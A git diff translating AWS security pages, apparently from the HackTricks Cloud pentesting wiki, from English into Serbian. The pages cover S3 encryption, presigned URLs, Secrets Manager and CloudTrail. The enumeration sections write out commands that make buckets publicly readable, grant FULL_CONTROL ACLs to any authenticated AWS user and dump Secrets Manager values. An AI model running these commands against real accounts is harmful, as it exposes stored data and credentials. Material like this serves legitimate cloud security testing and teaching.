-Amazon S3 provides multiple options to achieve the **protection** of data at REST. The options include **Permission** (Policy), **Encryption** (Client and Server Side), **Bucket Versioning** and **MFA** **based delete**. The **user can enable** any of these options to achieve data protection. **Data replication** is an internal facility by AWS where **S3 automatically replicates each object across all the Availability Zones** and the organization need not enable it in this case.
+Amazon S3 pruža više opcija za postizanje **zaštite** podataka u mirovanju. Opcije uključuju **Dozvolu** (Politiku), **Enkripciju** (Klijentsku i Serversku stranu), **Verzionisanje kanti** i **MFA** **zasnovano brisanje**. **Korisnik može omogućiti** bilo koju od ovih opcija za postizanje zaštite podataka. **Replikacija podataka** je interna funkcija AWS-a gde **S3 automatski replicira svaki objekat širom svih dostupnih zona** i organizacija je ne mora omogućiti u ovom slučaju.
 
-With resource-based permissions, you can define permissions for sub-directories of your bucket separately.
+Sa dozvolama zasnovanim na resursima, možete definisati dozvole za poddirektorijume vaše kante odvojeno.
 
-### Bucket Versioning and MFA based delete
+### Verzionisanje kanti i MFA zasnovano brisanje
 
-When bucket versioning is enabled, any action that tries to alter a file inside a file will generate a new version of the file, keeping also the previous content of the same. Therefore, it won't overwrite its content.
+Kada je verzionisanje kanti omogućeno, svaka akcija koja pokušava da izmeni datoteku unutar datoteke generisaće novu verziju datoteke, zadržavajući takođe prethodni sadržaj iste. Stoga, neće prepisati njen sadržaj.
 
-Moreover, MFA based delete will prevent versions of file in the S3 bucket from being deleted and also Bucket Versioning from being disabled, so an attacker won't be able to alter these files.
+Štaviše, MFA zasnovano brisanje će sprečiti verzije datoteka u S3 kanti da budu obrisane i takođe će sprečiti onemogućavanje verzionisanja kanti, tako da napadač neće moći da menja ove datoteke.
 
-### S3 Access logs
+### S3 pristupni logovi
 
-It's possible to **enable S3 access login** (which by default is disabled) to some bucket and save the logs in a different bucket to know who is accessing the bucket (both buckets must be in the same region).
+Moguće je **omogućiti S3 pristupne logove** (koji su po defaultu onemogućeni) za neku kantu i sačuvati logove u drugoj kanti kako bi se znalo ko pristupa kanti (obe kante moraju biti u istoj regiji).
 
-### S3 Presigned URLs
-
-It's possible to generate a presigned URL that can usually be used to **access the specified file** in the bucket. A **presigned URL looks like this**:
+### S3 Predpotpisani URL-ovi
 
+Moguće je generisati predpotpisani URL koji se obično može koristiti za **pristup određenoj datoteci** u kanti. **Predpotpisani URL izgleda ovako**:
 ```
 https://.s3.us-east-1.amazonaws.com/asd.txt?X-Amz-Algorithm=AWS4-HMAC-SHA256&X-Amz-Credential=ASIAUUE8GZC4S5L3TY3P%2F20230227%2Fus-east-1%2Fs3%2Faws4_request&X-Amz-Date=20230227T142551Z&X-Amz-Expires=3600&X-Amz-SignedHeaders=host&X-Amz-Security-Token=IQoJb3JpZ2luX2VjELf%2F%2F%2F%2F%2F%2F%2F%2F%2F%2FwEaCXVzLWVhc3QtMSJHMEUCIBhQpdETJO3HKKDk2hjNIrPWwBE8gZaQccZFV3kCpPCWAiEAid3ueDtFFU%2FOQfUpvxYTGO%2BHoS4SWDMUrQAE0pIaB40qggMIYBAAGgwzMTgxNDIxMzg1NTMiDJLI5t7gr2EGxG1Y5CrfAioW0foHIQ074y4gvk0c%2B%2Fmqc7cNWb1njQslQkeePHkseJ3owzc%2FCwkgE0EuZTd4mw0aJciA2XIbJRCLPWTb%2FCBKPnIMJ5aBzIiA2ltsiUNQTTUxYmEgXZoJ6rFYgcodnmWW0Et4Xw59UlHnCDB2bLImxPprriyCzDDCD6nLyp3J8pFF1S8h3ZTJE7XguA8joMs4%2B2B1%2FeOZfuxXKyXPYSKQOOSbQiHUQc%2BFnOfwxleRL16prWk1t7TamvHR%2Bt3UgMn5QWzB3p8FgWwpJ6GjHLkYMJZ379tkimL1tJ7o%2BIod%2FMYrS7LDCifP9d%2FuYOhKWGhaakPuJKJh9fl%2B0vGl7kmApXigROxEWon6ms75laXebltsWwKcKuYca%2BUWu4jVJx%2BWUfI4ofoaGiCSaKALTqwu4QNBRT%2BMoK6h%2BQa7gN7JFGg322lkxRY53x27WMbUE4unn5EmI54T4dWt1%2Bg8ljDS%2BvKfBjqmAWRwuqyfwXa5YC3xxttOr3YVvR6%2BaXpzWtvNJQNnb6v0uI3%2BTtTexZkJpLQYqFcgZLQSxsXWSnf988qvASCIUhAzp2UnS1uqy7QjtD5T73zksYN2aesll7rvB80qIuujG6NOdHnRJ2M5%2FKXXNo1Yd15MtzPuSjRoSB9RSMon5jFu31OrQnA9eCUoawxbB0nHqwK8a43CKBZHhA8RoUAJW%2B48EuFsp3U%3D&X-Amz-Signature=3436e4139e84dbcf5e2e6086c0ebc92f4e1e9332b6fda24697bc339acbf2cdfa
 ```
-
-A presigned URL can be **created from the cli using credentials of a principal with access to the object** (if the account you use doesn't have access, a shorter presigned URL will be created but it will be useless)
-
+A presigned URL can be **kreiran iz cli koristeći akreditive glavnog korisnika sa pristupom objektu** (ako nalog koji koristite nema pristup, biće kreiran kraći presigned URL, ali će biti beskoristan)
 ```bash
- aws s3 presign --region  's3:///'
+aws s3 presign --region  's3:///'
 ```
-
 > [!NOTE]
-> The only required permission to generate a presigned URL is the permission being given, so for the previous command the only permission needed by the principal is `s3:GetObject`
-
-It's also possible to create presigned URLs with **other permissions**:
+> Jedina potrebna dozvola za generisanje presignirane URL adrese je dozvola koja se daje, tako da je za prethodnu komandu jedina dozvola koja je potrebna principalu `s3:GetObject`
 
+Takođe je moguće kreirati presignirane URL adrese sa **drugim dozvolama**:
 ```python
 import boto3
 url = boto3.client('s3').generate_presigned_url(
-    ClientMethod='put_object',
-    Params={'Bucket': 'BUCKET_NAME', 'Key': 'OBJECT_KEY'},
-    ExpiresIn=3600
+ClientMethod='put_object',
+Params={'Bucket': 'BUCKET_NAME', 'Key': 'OBJECT_KEY'},
+ExpiresIn=3600
 )
 ```
-
 ### S3 Encryption Mechanisms
 
-**DEK means Data Encryption Key** and is the key that is always generated and used to encrypt data.
+**DEK znači Ključ za enkripciju podataka** i to je ključ koji se uvek generiše i koristi za enkripciju podataka.
 
 

 
-Server-side encryption with S3 managed keys, SSE-S3
+Enkripcija na strani servera sa S3 upravljanim ključevima, SSE-S3
 
-This option requires minimal configuration and all management of encryption keys used are managed by AWS. All you need to do is to **upload your data and S3 will handle all other aspects**. Each bucket in a S3 account is assigned a bucket key.
+Ova opcija zahteva minimalnu konfiguraciju i svu upravu nad ključevima za enkripciju vrši AWS. Sve što treba da uradite je da **otpremite svoje podatke i S3 će se pobrinuti za sve ostale aspekte**. Svakom bucket-u u S3 nalogu dodeljuje se ključ bucket-a.
 
-- Encryption:
-  - Object Data + created plaintext DEK --> Encrypted data (stored inside S3)
-  - Created plaintext DEK + S3 Master Key --> Encrypted DEK (stored inside S3) and plain text is deleted from memory
-- Decryption:
-  - Encrypted DEK + S3 Master Key --> Plaintext DEK
-  - Plaintext DEK + Encrypted data --> Object Data
+- Enkripcija:
+- Podaci objekta + kreirani obični DEK --> Enkriptovani podaci (smešteni unutar S3)
+- Kreirani obični DEK + S3 Master Key --> Enkriptovani DEK (smešten unutar S3) i običan tekst se briše iz memorije
+- Dekripcija:
+- Enkriptovani DEK + S3 Master Key --> Obični DEK
+- Obični DEK + Enkriptovani podaci --> Podaci objekta
 
-Please, note that in this case **the key is managed by AWS** (rotation only every 3 years). If you use your own key you willbe able to rotate, disable and apply access control.
+Napomena: u ovom slučaju **ključ upravlja AWS** (rotacija samo svake 3 godine). Ako koristite svoj ključ, moći ćete da rotirate, onemogućite i primenite kontrolu pristupa.
 
 

 
 

 
-Server-side encryption with KMS managed keys, SSE-KMS
+Enkripcija na strani servera sa KMS upravljanim ključevima, SSE-KMS
 
-This method allows S3 to use the key management service to generate your data encryption keys. KMS gives you a far greater flexibility of how your keys are managed. For example, you are able to disable, rotate, and apply access controls to the CMK, and order to against their usage using AWS Cloud Trail.
+Ova metoda omogućava S3 da koristi servis za upravljanje ključevima za generisanje vaših ključeva za enkripciju podataka. KMS vam daje mnogo veću fleksibilnost u upravljanju vašim ključevima. Na primer, možete onemogućiti, rotirati i primeniti kontrole pristupa na CMK, i narediti protiv njihove upotrebe koristeći AWS Cloud Trail.
 
-- Encryption:
-  - S3 request data keys from KMS CMK
-  - KMS uses a CMK to generate the pair DEK plaintext and DEK encrypted and send them to S£
-  - S3 uses the paintext key to encrypt the data, store the encrypted data and the encrypted key and deletes from memory the plain text key
-- Decryption:
-  - S3 ask to KMS to decrypt the encrypted data key of the object
-  - KMS decrypt the data key with the CMK and send it back to S3
-  - S3 decrypts the object data
+- Enkripcija:
+- S3 zahteva ključeve podataka od KMS CMK
+- KMS koristi CMK za generisanje para DEK običnog i DEK enkriptovanog i šalje ih S3
+- S3 koristi obični ključ za enkripciju podataka, čuva enkriptovane podatke i enkriptovani ključ i briše iz memorije obični ključ
+- Dekripcija:
+- S3 traži od KMS da dekriptuje enkriptovani ključ podataka objekta
+- KMS dekriptuje ključ podataka sa CMK i vraća ga S3
+- S3 dekriptuje podatke objekta
 
 

 
 

 
-Server-side encryption with customer provided keys, SSE-C
+Enkripcija na strani servera sa ključevima koje obezbeđuje korisnik, SSE-C
 
-This option gives you the opportunity to provide your own master key that you may already be using outside of AWS. Your customer-provided key would then be sent with your data to S3, where S3 would then perform the encryption for you.
+Ova opcija vam daje priliku da obezbedite svoj vlastiti master ključ koji možda već koristite van AWS-a. Vaš ključ koji obezbeđuje korisnik biće zatim poslat sa vašim podacima u S3, gde će S3 izvršiti enkripciju za vas.
 
-- Encryption:
-  - The user sends the object data + Customer key to S3
-  - The customer key is used to encrypt the data and the encrypted data is stored
-  - a salted HMAC value of the customer key is stored also for future key validation
-  - the customer key is deleted from memory
-- Decryption:
-  - The user send the customer key
-  - The key is validated against the HMAC value stored
-  - The customer provided key is then used to decrypt the data
+- Enkripcija:
+- Korisnik šalje podatke objekta + Ključ korisnika u S3
+- Ključ korisnika se koristi za enkripciju podataka i enkriptovani podaci se čuvaju
+- takođe se čuva zasoljena HMAC vrednost ključa korisnika za buduću validaciju ključa
+- ključ korisnika se briše iz memorije
+- Dekripcija:
+- Korisnik šalje ključ korisnika
+- Ključ se validira u odnosu na sačuvanu HMAC vrednost
+- Ključ koji obezbeđuje korisnik se zatim koristi za dekripciju podataka
 
 

 
 

 
-Client-side encryption with KMS, CSE-KMS
+Enkripcija na strani klijenta sa KMS, CSE-KMS
 
-Similarly to SSE-KMS, this also uses the key management service to generate your data encryption keys. However, this time KMS is called upon via the client not S3. The encryption then takes place client-side and the encrypted data is then sent to S3 to be stored.
+Slično SSE-KMS, ovo takođe koristi servis za upravljanje ključevima za generisanje vaših ključeva za enkripciju podataka. Međutim, ovaj put KMS se poziva putem klijenta, a ne S3. Enkripcija se zatim vrši na strani klijenta, a enkriptovani podaci se šalju u S3 na čuvanje.
 
-- Encryption:
-  - Client request for a data key to KMS
-  - KMS returns the plaintext DEK and the encrypted DEK with the CMK
-  - Both keys are sent back
-  - The client then encrypts the data with the plaintext DEK and send to S3 the encrypted data + the encrypted DEK (which is saved as metadata of the encrypted data inside S3)
-- Decryption:
-  - The encrypted data with the encrypted DEK is sent to the client
-  - The client asks KMS to decrypt the encrypted key using the CMK and KMS sends back the plaintext DEK
-  - The client can now decrypt the encrypted data
+- Enkripcija:
+- Klijent zahteva ključ podataka od KMS
+- KMS vraća obični DEK i enkriptovani DEK sa CMK
+- Obe ključeve šalje nazad
+- Klijent zatim enkriptuje podatke sa običnim DEK-om i šalje S3 enkriptovane podatke + enkriptovani DEK (koji se čuva kao metapodatak enkriptovanih podataka unutar S3)
+- Dekripcija:
+- Enkriptovani podaci sa enkriptovanim DEK-om se šalju klijentu
+- Klijent traži od KMS da dekriptuje enkriptovani ključ koristeći CMK, a KMS vraća obični DEK
+- Klijent sada može dekriptovati enkriptovane podatke
 
 

 
 

 
-Client-side encryption with customer provided keys, CSE-C
+Enkripcija na strani klijenta sa ključevima koje obezbeđuje korisnik, CSE-C
 
-Using this mechanism, you are able to utilize your own provided keys and use an AWS-SDK client to encrypt your data before sending it to S3 for storage.
+Korišćenjem ovog mehanizma, možete koristiti svoje obezbeđene ključeve i koristiti AWS-SDK klijent za enkripciju vaših podataka pre slanja u S3 na čuvanje.
 
-- Encryption:
-  - The client generates a DEK and encrypts the plaintext data
-  - Then, using it's own custom CMK it encrypts the DEK
-  - submit the encrypted data + encrypted DEK to S3 where it's stored
-- Decryption:
-  - S3 sends the encrypted data and DEK
-  - As the client already has the CMK used to encrypt the DEK, it decrypts the DEK and then uses the plaintext DEK to decrypt the data
+- Enkripcija:
+- Klijent generiše DEK i enkriptuje obične podatke
+- Zatim, koristeći svoj prilagođeni CMK, enkriptuje DEK
+- šalje enkriptovane podatke + enkriptovani DEK u S3 gde se čuva
+- Dekripcija:
+- S3 šalje enkriptovane podatke i DEK
+- Kako klijent već ima CMK koji se koristi za enkripciju DEK-a, dekriptuje DEK i zatim koristi obični DEK za dekripciju podataka
 
 

 
-### **Enumeration**
-
-One of the traditional main ways of compromising AWS orgs start by compromising buckets publicly accesible. **You can find** [**public buckets enumerators in this page**](../aws-unauthenticated-enum-access/#s3-buckets)**.**
+### **Enumeracija**
 
+Jedan od tradicionalnih glavnih načina kompromitovanja AWS organizacija počinje kompromitovanjem javno dostupnih bucket-a. **Možete pronaći** [**javne enumeratore bucket-a na ovoj stranici**](../aws-unauthenticated-enum-access/#s3-buckets)**.**
 ```bash
 # Get buckets ACLs
 aws s3api get-bucket-acl --bucket 
@@ -184,28 +177,28 @@ aws s3api list-objects --bucket BUCKETNAME --output json --query "[sum(Contents[
 aws s3api put-bucket-policy --policy file:///root/policy.json --bucket 
 ##JSON policy example
 {
-  "Id": "Policy1568185116930",
-  "Version": "2012-10-17",
-  "Statement": [
-  {
-      "Sid": "Stmt1568184932403",
-      "Action": [
-        "s3:ListBucket"
-      ],
-      "Effect": "Allow",
-      "Resource": "arn:aws:s3:::welcome",
-      "Principal": "*"
-  },
-  {
-    "Sid": "Stmt1568185007451",
-    "Action": [
-      "s3:GetObject"
-    ],
-    "Effect": "Allow",
-    "Resource": "arn:aws:s3:::welcome/*",
-    "Principal": "*"
-  }
-  ]
+"Id": "Policy1568185116930",
+"Version": "2012-10-17",
+"Statement": [
+{
+"Sid": "Stmt1568184932403",
+"Action": [
+"s3:ListBucket"
+],
+"Effect": "Allow",
+"Resource": "arn:aws:s3:::welcome",
+"Principal": "*"
+},
+{
+"Sid": "Stmt1568185007451",
+"Action": [
+"s3:GetObject"
+],
+"Effect": "Allow",
+"Resource": "arn:aws:s3:::welcome/*",
+"Principal": "*"
+}
+]
 }
 
 # Update bucket ACL
@@ -218,41 +211,40 @@ aws s3api put-object-acl --bucket  --key flag --access-control-poli
 ##JSON ACL example
 ## Make sure to modify the Owner’s displayName and ID according to the Object ACL you retrieved.
 {
-  "Owner": {
-    "DisplayName": "",
-    "ID": ""
-  },
-  "Grants": [
-  {
-    "Grantee": {
-      "Type": "Group",
-      "URI": "http://acs.amazonaws.com/groups/global/AuthenticatedUsers"
-    },
-  "Permission": "FULL_CONTROL"
-  }
-  ]
+"Owner": {
+"DisplayName": "",
+"ID": ""
+},
+"Grants": [
+{
+"Grantee": {
+"Type": "Group",
+"URI": "http://acs.amazonaws.com/groups/global/AuthenticatedUsers"
+},
+"Permission": "FULL_CONTROL"
+}
+]
 }
 ## An ACL should give you the permission WRITE_ACP to be able to put a new ACL
 ```
-
 ### dual-stack 
 
-You can access an S3 bucket through a dual-stack endpoint by using a virtual hosted-style or a path-style endpoint name. These are useful to access S3 through IPv6.
+Možete pristupiti S3 bucket-u putem dual-stack endpoint-a koristeći virtualni hosted-style ili path-style endpoint naziv. Ovi su korisni za pristup S3 putem IPv6.
 
-Dual-stack endpoints use the following syntax:
+Dual-stack endpoint-i koriste sledeću sintaksu:
 
 - `bucketname.s3.dualstack.aws-region.amazonaws.com`
 - `s3.dualstack.aws-region.amazonaws.com/bucketname`
 
 ### Privesc
 
-In the following page you can check how to **abuse S3 permissions to escalate privileges**:
+Na sledećoj stranici možete proveriti kako da **zloupotrebite S3 dozvole za eskalaciju privilegija**:
 
 {{#ref}}
 ../aws-privilege-escalation/aws-s3-privesc.md
 {{#endref}}
 
-### Unauthenticated Access
+### Neautentifikovani pristup
 
 {{#ref}}
 ../aws-unauthenticated-enum-access/aws-s3-unauthenticated-enum.md
@@ -264,32 +256,31 @@ In the following page you can check how to **abuse S3 permissions to escalate pr
 ../aws-post-exploitation/aws-s3-post-exploitation.md
 {{#endref}}
 
-### Persistence
+### Persistencija
 
 {{#ref}}
 ../aws-persistence/aws-s3-persistence.md
 {{#endref}}
 
-## Other S3 vulns
+## Ostale S3 ranjivosti
 
 ### S3 HTTP Cache Poisoning Issue 
 
-[**According to this research**](https://rafa.hashnode.dev/exploiting-http-parsers-inconsistencies#heading-s3-http-desync-cache-poisoning-issue) it was possible to cache the response of an arbitrary bucket as if it belonged to a different one. This could have been abused to change for example javascript file responses and compromise arbitrary pages using S3 to store static code.
+[**Prema ovom istraživanju**](https://rafa.hashnode.dev/exploiting-http-parsers-inconsistencies#heading-s3-http-desync-cache-poisoning-issue) bilo je moguće keširati odgovor proizvoljnog bucket-a kao da pripada drugom. Ovo se moglo zloupotrebiti za promenu, na primer, odgovora javascript datoteka i kompromitovanje proizvoljnih stranica koristeći S3 za skladištenje statičkog koda.
 
 ## Amazon Athena
 
-Amazon Athena is an interactive query service that makes it easy to **analyze data** directly in Amazon Simple Storage Service (Amazon **S3**) **using** standard **SQL**.
+Amazon Athena je interaktivna usluga za upite koja olakšava **analizu podataka** direktno u Amazon Simple Storage Service (Amazon **S3**) **koristeći** standardni **SQL**.
 
-You need to **prepare a relational DB table** with the format of the content that is going to appear in the monitored S3 buckets. And then, Amazon Athena will be able to populate the DB from the logs, so you can query it.
+Treba da **pripremite relacijsku DB tabelu** sa formatom sadržaja koji će se pojaviti u nadgledanim S3 bucket-ima. A zatim, Amazon Athena će moći da popuni DB iz logova, tako da možete da upitujete.
 
-Amazon Athena supports the **ability to query S3 data that is already encrypted** and if configured to do so, **Athena can also encrypt the results of the query which can then be stored in S3**.
+Amazon Athena podržava **mogućnost upita nad S3 podacima koji su već enkriptovani** i ako je tako konfigurisano, **Athena takođe može enkriptovati rezultate upita koji se zatim mogu skladištiti u S3**.
 
-**This encryption of results is independent of the underlying queried S3 data**, meaning that even if the S3 data is not encrypted, the queried results can be encrypted. A couple of points to be aware of is that Amazon Athena only supports data that has been **encrypted** with the **following S3 encryption methods**, **SSE-S3, SSE-KMS, and CSE-KMS**.
+**Ova enkripcija rezultata je nezavisna od osnovnih upitanih S3 podataka**, što znači da čak i ako S3 podaci nisu enkriptovani, upitani rezultati mogu biti enkriptovani. Par tačaka na koje treba obratiti pažnju je da Amazon Athena podržava samo podatke koji su **enkriptovani** sa **sledećim S3 metodama enkripcije**, **SSE-S3, SSE-KMS, i CSE-KMS**.
 
-SSE-C and CSE-E are not supported. In addition to this, it's important to understand that Amazon Athena will only run queries against **encrypted objects that are in the same region as the query itself**. If you need to query S3 data that's been encrypted using KMS, then specific permissions are required by the Athena user to enable them to perform the query.
+SSE-C i CSE-E nisu podržani. Pored ovoga, važno je razumeti da će Amazon Athena izvršavati upite samo protiv **enkriptovanih objekata koji su u istoj regiji kao i sam upit**. Ako trebate da upitujete S3 podatke koji su enkriptovani koristeći KMS, tada su potrebne specifične dozvole korisnika Athene da im omoguće izvršavanje upita.
 
 ### Enumeration
-
 ```bash
 # Get catalogs
 aws athena list-data-catalogs
@@ -311,14 +302,9 @@ aws athena get-prepared-statement --statement-name  --work-group 
 # Run query
 aws athena start-query-execution --query-string 
 ```
-
-## References
+## Референце
 
 - [https://cloudsecdocs.com/aws/defensive/tooling/cli/#s3](https://cloudsecdocs.com/aws/defensive/tooling/cli/#s3)
 - [https://docs.aws.amazon.com/AmazonS3/latest/userguide/dual-stack-endpoints.html](https://docs.aws.amazon.com/AmazonS3/latest/userguide/dual-stack-endpoints.html)
 
 {{#include ../../../banners/hacktricks-training.md}}
-
-
-
-
diff --git a/src/pentesting-cloud/aws-security/aws-services/aws-secrets-manager-enum.md b/src/pentesting-cloud/aws-security/aws-services/aws-secrets-manager-enum.md
index a50eaa24f..4940c4658 100644
--- a/src/pentesting-cloud/aws-security/aws-services/aws-secrets-manager-enum.md
+++ b/src/pentesting-cloud/aws-security/aws-services/aws-secrets-manager-enum.md
@@ -4,22 +4,21 @@
 
 ## AWS Secrets Manager
 
-AWS Secrets Manager is designed to **eliminate the use of hard-coded secrets in applications by replacing them with an API call**. This service serves as a **centralized repository for all your secrets**, ensuring they are managed uniformly across all applications.
+AWS Secrets Manager je dizajniran da **eliminira korišćenje hard-kodiranih tajni u aplikacijama zamenjujući ih API pozivom**. Ova usluga služi kao **centralizovani repozitorijum za sve vaše tajne**, osiguravajući da se njima upravlja uniformno kroz sve aplikacije.
 
-The manager simplifies the **process of rotating secrets**, significantly improving the security posture of sensitive data like database credentials. Additionally, secrets like API keys can be automatically rotated with the integration of lambda functions.
+Menadžer pojednostavljuje **proces rotacije tajni**, značajno poboljšavajući bezbednosni položaj osetljivih podataka kao što su kredencijali baze podataka. Pored toga, tajne kao što su API ključevi mogu se automatski rotirati uz integraciju lambda funkcija.
 
-The access to secrets is tightly controlled through detailed IAM identity-based policies and resource-based policies.
+Pristup tajnama je strogo kontrolisan kroz detaljne IAM politike zasnovane na identitetu i politike zasnovane na resursima.
 
-For granting access to secrets to a user from a different AWS account, it's necessary to:
+Za dodeljivanje pristupa tajnama korisniku iz drugog AWS naloga, potrebno je:
 
-1. Authorize the user to access the secret.
-2. Grant permission to the user to decrypt the secret using KMS.
-3. Modify the Key policy to allow the external user to utilize it.
+1. Ovlastiti korisnika da pristupi tajni.
+2. Dodeliti dozvolu korisniku da dekriptuje tajnu koristeći KMS.
+3. Izmeniti politiku ključa da omogući spoljnjem korisniku da je koristi.
 
-**AWS Secrets Manager integrates with AWS KMS to encrypt your secrets within AWS Secrets Manager.**
+**AWS Secrets Manager se integriše sa AWS KMS za enkripciju vaših tajni unutar AWS Secrets Manager.**
 
 ### **Enumeration**
-
 ```bash
 aws secretsmanager list-secrets #Get metadata of all secrets
 aws secretsmanager list-secret-version-ids --secret-id  # Get versions
@@ -28,7 +27,6 @@ aws secretsmanager get-secret-value --secret-id  # Get value
 aws secretsmanager get-secret-value --secret-id  --version-id  # Get value of a different version
 aws secretsmanager get-resource-policy --secret-id --secret-id 
 ```
-
 ### Privesc
 
 {{#ref}}
@@ -48,7 +46,3 @@ aws secretsmanager get-resource-policy --secret-id --secret-id 
 {{#endref}}
 
 {{#include ../../../banners/hacktricks-training.md}}
-
-
-
-
diff --git a/src/pentesting-cloud/aws-security/aws-services/aws-security-and-detection-services/README.md b/src/pentesting-cloud/aws-security/aws-services/aws-security-and-detection-services/README.md
index 8348ff098..a0e72e9b6 100644
--- a/src/pentesting-cloud/aws-security/aws-services/aws-security-and-detection-services/README.md
+++ b/src/pentesting-cloud/aws-security/aws-services/aws-security-and-detection-services/README.md
@@ -1,6 +1 @@
-# AWS - Security & Detection Services
-
-
-
-
-
+# AWS - Bezbednost i Detekcijske Usluge
diff --git a/src/pentesting-cloud/aws-security/aws-services/aws-security-and-detection-services/aws-cloudtrail-enum.md b/src/pentesting-cloud/aws-security/aws-services/aws-security-and-detection-services/aws-cloudtrail-enum.md
index 780f52f6e..438e504cb 100644
--- a/src/pentesting-cloud/aws-security/aws-services/aws-security-and-detection-services/aws-cloudtrail-enum.md
+++ b/src/pentesting-cloud/aws-security/aws-services/aws-security-and-detection-services/aws-cloudtrail-enum.md
@@ -4,111 +4,108 @@
 
 ## **CloudTrail**
 
-AWS CloudTrail **records and monitors activity within your AWS environment**. It captures detailed **event logs**, including who did what, when, and from where, for all interactions with AWS resources. This provides an audit trail of changes and actions, aiding in security analysis, compliance auditing, and resource change tracking. CloudTrail is essential for understanding user and resource behavior, enhancing security postures, and ensuring regulatory compliance.
+AWS CloudTrail **beleži i prati aktivnost unutar vašeg AWS okruženja**. Zapisuje detaljne **logove događaja**, uključujući ko je šta uradio, kada i odakle, za sve interakcije sa AWS resursima. Ovo pruža trag revizije promena i akcija, pomažući u analizi bezbednosti, reviziji usklađenosti i praćenju promena resursa. CloudTrail je ključan za razumevanje ponašanja korisnika i resursa, poboljšanje bezbednosnih mera i osiguranje usklađenosti sa propisima.
 
-Each logged event contains:
+Svaki zabeleženi događaj sadrži:
 
-- The name of the called API: `eventName`
-- The called service: `eventSource`
-- The time: `eventTime`
-- The IP address: `SourceIPAddress`
-- The agent method: `userAgent`. Examples:
-  - Signing.amazonaws.com - From AWS Management Console
-  - console.amazonaws.com - Root user of the account
-  - lambda.amazonaws.com - AWS Lambda
-- The request parameters: `requestParameters`
-- The response elements: `responseElements`
+- Ime pozvane API: `eventName`
+- Pozvana usluga: `eventSource`
+- Vreme: `eventTime`
+- IP adresa: `SourceIPAddress`
+- Metoda agenta: `userAgent`. Primeri:
+- Signing.amazonaws.com - Iz AWS Management Console
+- console.amazonaws.com - Root korisnik naloga
+- lambda.amazonaws.com - AWS Lambda
+- Parametri zahteva: `requestParameters`
+- Elementi odgovora: `responseElements`
 
-Event's are written to a new log file **approximately each 5 minutes in a JSON file**, they are held by CloudTrail and finally, log files are **delivered to S3 approximately 15mins after**.\
-CloudTrails logs can be **aggregated across accounts and across regions.**\
-CloudTrail allows to use **log file integrity in order to be able to verify that your log files have remained unchanged** since CloudTrail delivered them to you. It creates a SHA-256 hash of the logs inside a digest file. A sha-256 hash of the new logs is created every hour.\
-When creating a Trail the event selectors will allow you to indicate the trail to log: Management, data or insights events.
+Događaji se upisuju u novu log datoteku **otprilike svake 5 minuta u JSON datoteci**, čuvaju ih CloudTrail i na kraju, log datoteke se **isporučuju u S3 otprilike 15 minuta nakon**.\
+CloudTrail logovi se mogu **agregirati između naloga i između regiona.**\
+CloudTrail omogućava korišćenje **integriteta log datoteka kako biste mogli da verifikujete da su vaše log datoteke ostale nepromenjene** od trenutka kada ih je CloudTrail isporučio vama. Kreira SHA-256 hash logova unutar datoteke sa sažetkom. SHA-256 hash novih logova se kreira svake sat vremena.\
+Kada kreirate Trail, selektori događaja će vam omogućiti da označite trail za logovanje: upravljanje, podatke ili uvid događaje.
 
-Logs are saved in an S3 bucket. By default Server Side Encryption is used (SSE-S3) so AWS will decrypt the content for the people that has access to it, but for additional security you can use SSE with KMS and your own keys.
+Logovi se čuvaju u S3 kanti. Po defaultu se koristi enkripcija sa servera (SSE-S3) tako da AWS dekriptuje sadržaj za ljude koji imaju pristup, ali za dodatnu bezbednost možete koristiti SSE sa KMS i svojim ključevima.
 
-The logs are stored in a **S3 bucket with this name format**:
+Logovi se čuvaju u **S3 kanti sa ovim formatom imena**:
 
 - **`BucketName/AWSLogs/AccountID/CloudTrail/RegionName/YYY/MM/DD`**
-- Being the BucketName: **`aws-cloudtrail-logs--`**
-- Example: **`aws-cloudtrail-logs-947247140022-ffb95fe7/AWSLogs/947247140022/CloudTrail/ap-south-1/2023/02/22/`**
+- Gde je BucketName: **`aws-cloudtrail-logs--`**
+- Primer: **`aws-cloudtrail-logs-947247140022-ffb95fe7/AWSLogs/947247140022/CloudTrail/ap-south-1/2023/02/22/`**
 
-Inside each folder each log will have a **name following this format**: **`AccountID_CloudTrail_RegionName_YYYYMMDDTHHMMZ_Random.json.gz`**
+Unutar svake fascikle svaki log će imati **ime koje prati ovaj format**: **`AccountID_CloudTrail_RegionName_YYYYMMDDTHHMMZ_Random.json.gz`**
 
-Log File Naming Convention
+Konvencija imenovanja log datoteka
 
 ![](<../../../../images/image (122).png>)
 
-Moreover, **digest files (to check file integrity)** will be inside the **same bucket** in:
+Pored toga, **datoteke sa sažetkom (za proveru integriteta datoteka)** će biti unutar **iste kante** u:
 
 ![](<../../../../images/image (195).png>)
 
-### Aggregate Logs from Multiple Accounts
+### Agregiranje logova iz više naloga
 
-- Create a Trial in the AWS account where you want the log files to be delivered to
-- Apply permissions to the destination S3 bucket allowing cross-account access for CloudTrail and allow each AWS account that needs access
-- Create a new Trail in the other AWS accounts and select to use the created bucket in step 1
+- Kreirajte Trail u AWS nalogu u koji želite da se log datoteke isporuče
+- Primijenite dozvole na odredišnu S3 kantu omogućavajući pristup između naloga za CloudTrail i dozvolite svakom AWS nalogu koji treba pristup
+- Kreirajte novi Trail u drugim AWS nalozima i izaberite da koristite kreiranu kantu u koraku 1
 
-However, even if you can save al the logs in the same S3 bucket, you cannot aggregate CloudTrail logs from multiple accounts into a CloudWatch Logs belonging to a single AWS account.
+Međutim, čak i ako možete sačuvati sve logove u istoj S3 kanti, ne možete agregirati CloudTrail logove iz više naloga u CloudWatch Logs koji pripada jednom AWS nalogu.
 
 > [!CAUTION]
-> Remember that an account can have **different Trails** from CloudTrail **enabled** storing the same (or different) logs in different buckets.
+> Zapamtite da nalog može imati **različite Trails** iz CloudTrail **omogućenih** koji čuvaju iste (ili različite) logove u različitim kantama.
 
-### Cloudtrail from all org accounts into 1
+### CloudTrail iz svih org naloga u 1
 
-When creating a CloudTrail, it's possible to indicate to get activate cloudtrail for all the accounts in the org and get the logs into just 1 bucket:
+Kada kreirate CloudTrail, moguće je naznačiti da se aktivira cloudtrail za sve naloge u organizaciji i da se logovi dobiju u samo 1 kantu:
 
 

 
-This way you can easily configure CloudTrail in all the regions of all the accounts and centralize the logs in 1 account (that you should protect).
+Na ovaj način možete lako konfigurisati CloudTrail u svim regionima svih naloga i centralizovati logove u 1 nalog (koji treba da zaštitite).
 
-### Log Files Checking
-
-You can check that the logs haven't been altered by running
+### Provera log datoteka
 
+Možete proveriti da logovi nisu izmenjeni pokretanjem
 ```javascript
 aws cloudtrail validate-logs --trail-arn  --start-time  [--end-time ] [--s3-bucket ] [--s3-prefix ] [--verbose]
 ```
